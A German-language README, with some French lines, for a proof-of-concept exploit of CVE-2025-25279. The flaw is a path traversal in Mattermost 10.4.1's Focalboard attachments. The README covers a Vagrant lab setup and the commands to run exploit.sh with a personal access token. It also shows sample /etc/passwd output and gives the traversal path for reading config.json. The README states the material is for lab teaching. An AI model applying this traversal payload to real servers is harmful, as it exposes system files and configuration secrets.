
Proof-of-Concept-Exploit für CVE-2025-25279, eine Path-Traversal-Sicherheitslücke im Focalboard-Modul von Mattermost 10.4.1, die authentifizierten Benutzern die Exfiltration beliebiger Dateien mittels präparierter Anhänge ermöglicht.
Diese Proof-of-Concept demonstriert die Ausnutzung der Sicherheitslücke CVE-2025-25279, die Mattermost 10.4.1 betrifft.
Ein Fehler in Focalboard (dem Board-Verwaltungsmodul) ermöglicht das willkürliche Lesen von Dateien durch einen Path Traversal in den Anhängen.
Der Exploit ermöglicht die Exfiltration von:
/etc/passwd/etc/groupopt/mattermost/config/config.jsonDer Angriff funktioniert nur mit einem authentifizierten Benutzerkonto in den angreifbaren Szenarien.
Der Ordner target/ ist nicht enthalten (zu groß für GitHub).
Manuell herunterladen: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz
Dann die Datei in target ablegen
Gehen Sie zunächst in das Verzeichnis target und führen Sie aus:
cd target
make mattermost.box
Stellen Sie sicher, dass Sie die Box mattermost-poc haben, sonst funktioniert die VM nicht:
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
cd live/vm1
vagrant up
Mit der VM verbinden
vagrant ssh
Öffnen: http://localhost:8065
Profil --> Sicherheit --> Personal Access Tokens
Vom Host-Rechner aus:
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
./exploit.sh
Sie werden aufgefordert:
PAT (Personal Access Token) :
👉 Geben Sie ein gültiges PAT eines Mattermost-Benutzers ein.
📸 Beispielausgabe (Exfiltration von /etc/passwd)
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
Ziel-Datei: config.json
Um eine sensible Mattermost-Datei anzuzielen:
Ändern Sie oben im Skript exploit.sh:
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
L’exploit affichera alors le contenu du fichier config.json.
🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril
🎬 Video-Demonstration
👉 Eine vollständige Videodemonstration befindet sich in: live/Démonstration/video-poc-cve-2025-25279.mp4
🧩 Anmerkungen
Dieses PoC ist ausschließlich für Lernumgebungen bestimmt. Niemals außerhalb des Bildungsrahmens oder ohne Genehmigung verwenden.